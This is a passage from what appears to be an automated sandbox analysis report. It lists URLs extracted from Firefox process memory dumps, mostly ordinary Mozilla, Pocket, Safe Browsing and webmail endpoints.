Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3301079481.000001B635260000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3293412556.000001B634FDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3483013862.000001B63DC56000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3301079481.000001B635260000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3293412556.000001B634FDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 0000001D.00000002.3301079481.000001B635260000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3301079481.000001B635203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3293412556.000001B634FDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000001D.00000002.3301079481.000001B635260000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.3301079481.000001B635203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_moreError
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3293412556.000001B634FDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 0000001D.00000002.3301079481.000001B635260000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 0000001D.00000002.3301079481.000001B635260000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3301079481.000001B635260000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 0000001D.00000002.3326603033.000001B635903000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/
Source: firefox.exe, 0000001D.00000002.3489841190.000001B63DFD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/cfworker
Source: firefox.exe, 0000001D.00000003.3129065732.000001B63DA5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3479649121.000001B63DA5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 0000001D.00000002.3479649121.000001B63DA57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 0000001D.00000002.3479649121.000001B63DA57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 0000001D.00000002.3479649121.000001B63DA5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 0000001D.00000002.3479649121.000001B63DA5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 0000001D.00000003.3067176778.000001B635500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3067599382.000001B63571E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3348398161.000001B636000000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3068223683.000001B635761000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3068004981.000001B63573F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshotshttps://screenshots.firefox.com/
Source: firefox.exe, 0000001D.00000002.3301079481.000001B635260000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 0000001D.00000002.3301079481.000001B635260000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F25000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3301079481.000001B635260000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 0000001D.00000002.3497366247.000014FC8A604000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com
Source: firefox.exe, 0000001D.00000002.3315352593.000001B6355D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: firefox.exe, 0000001D.00000002.3301079481.000001B635260000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3191369944.000001B625D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://img-getpocket.cdn.mozilla.net/
Source: 3e169c0a7e.exe, 0000000F.00000003.3084602263.0000000005AFF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3245912168.000001B6315AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 0000001D.00000002.3270733549.000001B6333ED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 0000001D.00000002.3301079481.000001B63524F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 0000001D.00000002.3301079481.000001B635260000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 0000001D.00000002.3479649121.000001B63DA5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 0000001D.00000002.3489841190.000001B63DF6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2019-09/schema.
Source: firefox.exe, 0000001D.00000002.3489841190.000001B63DF6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2019-09/schema./
Source: firefox.exe, 0000001D.00000002.3489841190.000001B63DF6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2020-12/schema/
Source: firefox.exe, 0000001D.00000002.3489841190.000001B63DF6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2020-12/schema/=
Source: firefox.exe, 0000001D.00000002.3479649121.000001B63DA5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 0000001D.00000002.3479649121.000001B63DA5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 0000001D.00000002.3479649121.000001B63DA5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 0000001D.00000002.3270733549.000001B6333CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3315352593.000001B6355D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 0000001D.00000002.3398991599.000001B63675D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3418311411.000001B636A8B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3414137723.000001B636809000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3414137723.000001B636864000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F25000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3472196282.000001B639533000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3500451733.00002CF9CA51D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: firefox.exe, 0000001D.00000002.3472196282.000001B639533000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 0000001D.00000002.3290075534.000001B6336D3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3250256598.000001B631EB4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3326603033.000001B635922000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3327340390.000001B635A7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sbrowser.download.viewableInternally.typeWasRegiste
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3327340390.000001B635A7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3097956840.000001B635DC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000001D.00000002.3290075534.000001B6336D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 0000001D.00000003.3097197709.000001B635DC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336D3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3330207750.000001B635DDA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3327340390.000001B635A7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3097956840.000001B635DC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%shttp://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 0000001D.00000002.3290075534.000001B6336D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 0000001D.00000002.3250256598.000001B631EAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.combrowser.urlbar.openViewOnFocusmedia.autoplay.blocking_policy_migrateXULSt
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mozilla-hub.atlassian.net/browse/SDK-405
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 0000001D.00000002.3502058454.00003B0D7DE04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mozilla.org/
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mzl.la/3NS9KJd
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ok.ru/
Source: firefox.exe, 0000001D.00000002.3290075534.000001B6336D3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3327340390.000001B635A7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 0000001D.00000003.3097197709.000001B635DC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336D3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3330207750.000001B635DDA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3327340390.000001B635A7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3097956840.000001B635DC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%schrome://browser/content/schemas/menus.jsonextension/default-
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/DeferredTask.sys.mjsresource://gre/mod
Source: firefox.exe, 0000001D.00000002.3290075534.000001B6336D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F25000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://probeinfo.telemetry.mozilla.org/glean/repositories.
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 0000001D.00000002.3290075534.000001B6336A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.comException
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631F73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 0000001D.00000002.3250256598.000001B631EAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3068223683.000001B635761000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3315352593.000001B635576000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3068004981.000001B63573F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/pictureinpicture
